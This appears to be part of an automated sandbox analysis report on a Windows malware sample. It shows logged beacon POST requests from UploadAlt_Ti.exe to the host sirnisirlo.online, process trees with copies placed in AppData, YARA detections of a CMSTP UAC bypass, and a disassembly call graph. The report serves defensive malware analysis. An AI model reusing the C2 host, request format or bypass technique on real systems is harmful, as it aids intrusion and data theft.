                                                                                                                Data Ascii: AMM0A0qwud&mARm#rZ394:96:bAb#rZ36:9739:9:<:OA NS+bA#rZ8936KA
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 8a 08 23 72 9c 5a 99 86 29 22 28 14 00 a7 03 fe 0a 08 00 19 1d 0e 1f 19 41 08 b7 e3 e3 fe 0a 75 87 45 c9 44 2e af a7 5d 19 f6 bf 9a 57 de 56 10 00 db 00 47 0c 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 47 0c 6e 8a c2 b3 cc 92 c9 9f 14 00 5e 06 0f 0f 07 00 19 1d 0e 1f 19 41 08 08 bf bf 0f 0f 8a 08 23 72 9c 5a 99 86 a1 aa 29 29 a2 27 2a 10 00 0d 0a c1 0b 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 c1 0b db e9 d6 61 79 f1 dd 4d 14 00 e5 05 86 0e 0e 00 19 1d 0e 1f 19 41 08 52 bf bf 86 0e 8a 08 23 72 9c 5a 99 86 b1 b7 b7 b5 b4 b2 b9 17 b9 b8 36 b4 3a b2 10 00 bb 02 54 0a 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 54 0a a0 98 92 48 03 84 99 64 14 00 e8 04 33 07 04 00 19 1d 0e 1f 19 41 08 08 bf bf 33 07 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 1d 0a 8c 06 06 00 19 1d 0e 1f 19 41 08
                                                                                                                Data Ascii: #rZ)"(AuED.]WVGAGn^A#rZ))'*AayMAR#rZ6:TATHd3A3#rZ&A
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 2d 57 9a c3 96 07 8c ef 5b 89 e3 b2 67 14 00 38 00 e2 0b 08 00 19 1d 0e 1f 19 41 08 52 bf bf e2 0b 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 0d 0e 6a 0f 0b 00 19 1d 0e 1f 19 41 08 08 bf bf 6a 0f 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b0 3a b2 14 00 dd 01 f0 07 08 00 19 1d 0e 1f 19 41 08 ec e3 e3 f0 07 dd 40 13 8a 82 4d e7 2c f5 de a0 fc 5c 34 96 dd 14 00 76 0b f7 01 04 00 19 1d 0e 1f 19 41 08 08 bf bf f7 01 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 d9 09 f4 0d 23 00 19 1d 0e 1f 19 41 08 fb bf bf f4 0d 8a 08 23 72 9c 5a 99 86 32 b4 b9 b1 b7 39 32 b1 b0 37 b0 39 bc 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 14 00 58 05 34 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 34 01 38 64 e3 05 19 0e 28 b5 11 fa 50 73 c7 77 59 44
                                                                                                                Data Ascii: -W[g8AR#rZ8936jAj#rZ&6::A@M,\4vA#rZ&#A#rZ29279.&6:9.6;621X4A48d(PswYD
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 00 19 1d 0e 1f 19 41 04 fb c4 c4 d2 0c 0b 84 52 59 a9 9c 59 75 10 00 85 01 56 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 56 0f cf 5d 1e a8 7c 62 15 84 14 00 32 0a 46 02 06 00 19 1d 0e 1f 19 41 08 9b bf bf 46 02 8a 08 23 72 9c 5a 99 86 a3 ba b0 39 32 b0 14 00 ad 04 b3 0a 05 00 19 1d 0e 1f 19 41 08 08 bf bf b3 0a 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 14 00 99 0f 69 04 05 00 19 1d 0e 1f 19 41 08 08 bf bf 69 04 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 10 00 64 0d 94 04 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 94 04 0a 4a 03 d6 b9 75 08 fa 14 00 36 0d 2d 08 0e 00 19 1d 0e 1f 19 41 08 b7 bf bf 2d 08 8a 08 23 72 9c 5a 99 86 36 b7 b3 b4 37 ba b9 b2 39 b9 17 3b 32 33 14 00 1b 0a 18 00 09 00 19 1d 0e 1f 19 41 08 3b bf bf 18 00 8a 08 23 72 9c 5a 99 86 28 39 b7 3a b7 37 2b 28
                                                                                                                Data Ascii: ARYYuVAV]|b2FAF#rZ92A#rZ621iAi#rZ621dAJu6-A-#rZ679;23A;#rZ(9:7+(
                                                                                                                2024-11-14 18:57:45 UTC1369INData Raw: 5a 99 86 a1 34 39 b7 b6 b2 14 00 96 03 70 07 0d 00 19 1d 0e 1f 19 41 08 cb bf bf 70 07 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 10 00 1e 03 12 0f 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 12 0f 20 5d ae 5c 83 a4 50 75 14 00 d5 09 a2 0e 08 00 19 1d 0e 1f 19 41 08 9b e3 e3 a2 0e 3e 89 04 ce 64 9d ac 84 16 17 b7 b8 ba e4 dd 75 14 00 72 0f bf 01 13 00 19 1d 0e 1f 19 41 08 ec bf bf bf 01 8a 08 23 72 9c 5a 99 86 38 b0 b9 b9 bb b7 39 32 b9 17 b2 37 b1 b6 b0 b9 3a b2 39 14 00 f0 0b 10 0a 2a 00 19 1d 0e 1f 19 41 08 cb bf bf 10 0a 8a 08 23 72 9c 5a 99 86 a7 ba 3a 36 b7 b7 b5 ab b4 37 a0 38 38 a1 36 b0 b9 b9 b4 b1 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 14 00 b2 0c 8d 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 8d 01 00 e4 f3 cb
                                                                                                                Data Ascii: Z49pAp#rZ&6:9A ]\PuA>durA#rZ8927:9*A#rZ:67886.88":.&6.:6A


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.749266188.114.97.34434836C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:46 UTC449OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 53
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:46 UTC53OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii:
                                                                                                                2024-11-14 18:57:46 UTC733INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 14 Nov 2024 18:57:46 GMT
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDhLn1jL%2F6y3jT5Zyq%2BmyffTuz5B6wzXVWkE4JLeLVh8PXc%2BjqHwCt9UNPfLzx3G1xtaoEGEPLRsb62SZj3V5liEQ6lYD7R4%2BeJAcfsan3%2FPAraM5OTpGiyIes8nZSVxXL60Tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e293aa81ef42e27-DFW
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1138&delivery_rate=1477551&cwnd=251&unsent_bytes=0&cid=5ef26e219907a0dd&ts=419&x=0"
                                                                                                                2024-11-14 18:57:46 UTC84INData Raw: 34 65 0d 0a 00 00 00 00 00 00 00 00 3e 00 00 00 fe ff ff ff 91 9c ce 14 a1 ae 02 ce 0c 85 56 de ce 17 fd e1 44 ce 22 c7 31 38 ce 26 75 b6 d6 ce 03 d0 c6 1f ce 29 c4 8a b7 ce 22 7f cf 0c ce 02 03 ca 2b ce 04 73 90 21 ce 3e 9c 99 b4 ce 37 d1 d4 f3 0d 0a
                                                                                                                Data Ascii: 4e>VD"18&u)"+s!>7
                                                                                                                2024-11-14 18:57:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.749267188.114.97.34434836C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:47 UTC449OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 35
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:47 UTC35OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii:
                                                                                                                2024-11-14 18:57:48 UTC717INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:47 GMT
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mk7vBrnjoYr7X8eCM80Fl%2BOnXEfBxHvkxDzyVP%2FMEcMjJGb%2FsidGfR3nO9E1gID%2BYJjYVL9%2BNtdM0%2BS3EC65rf8mo%2B%2FudvYnsp9MhTat6lZmsj4Ejr2wrtjm6foOVvTfw3Sp3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e293ab0cfabc38a-SEA
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=54204&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1120&delivery_rate=53404&cwnd=32&unsent_bytes=0&cid=831757e9334cfe06&ts=692&x=0"


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:6
                                                                                                                Start time:13:56:04
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\TVr2Z822J3.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:11'140'776 bytes
                                                                                                                MD5 hash:467E95C9A46987552925C47BC7B38916
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:13:56:06
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\ActiveISO.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\ActiveISO.exe"
                                                                                                                Imagebase:0xb0000
                                                                                                                File size:1'266'616 bytes
                                                                                                                MD5 hash:B84DFABE933D1160F624693D94779CE5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1338281133.000001AD62686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:10
                                                                                                                Start time:13:56:10
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                Imagebase:0x7ff6b1fc0000
                                                                                                                File size:1'266'616 bytes
                                                                                                                MD5 hash:B84DFABE933D1160F624693D94779CE5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1419280539.000002B7CE788000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:13:56:13
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:13:56:13
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:15:55:44
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                Imagebase:0x140000000
                                                                                                                File size:2'364'728 bytes
                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:16
                                                                                                                Start time:15:55:58
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
                                                                                                                Imagebase:0x7ff6b1fc0000
                                                                                                                File size:1'266'616 bytes
                                                                                                                MD5 hash:B84DFABE933D1160F624693D94779CE5
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1820736512.0000023BF5A88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:17
                                                                                                                Start time:15:55:59
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1889758659.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1890287986.0000000004D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:15:55:59
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:15:56:10
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
                                                                                                                Imagebase:0x7ff6b1fc0000
                                                                                                                File size:1'266'616 bytes
                                                                                                                MD5 hash:B84DFABE933D1160F624693D94779CE5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1962021815.00000285613F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:25
                                                                                                                Start time:15:56:13
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2171548807.0000000005052000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:15:56:13
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:15:56:31
                                                                                                                Start date:14/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                Imagebase:0x140000000
                                                                                                                File size:2'364'728 bytes
                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2306254351.00000000026AF000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:17.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:25.9%
                                                                                                                  Total number of Nodes:1474
                                                                                                                  Total number of Limit Nodes:20
                                                                                                                  execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 